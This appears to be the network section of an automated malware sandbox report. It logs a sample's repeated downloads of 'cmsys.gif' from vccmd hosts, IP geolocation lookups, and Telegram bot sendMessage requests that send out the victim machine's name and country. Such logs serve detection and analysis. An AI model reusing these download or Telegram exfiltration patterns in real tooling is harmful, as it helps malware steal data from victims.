Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49752 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2005/03/2025%20/%2015:43:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2005/03/2025%20/%2014:33:57%0D%0ACountry%20Name:%20United%20States%0D%0A[%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
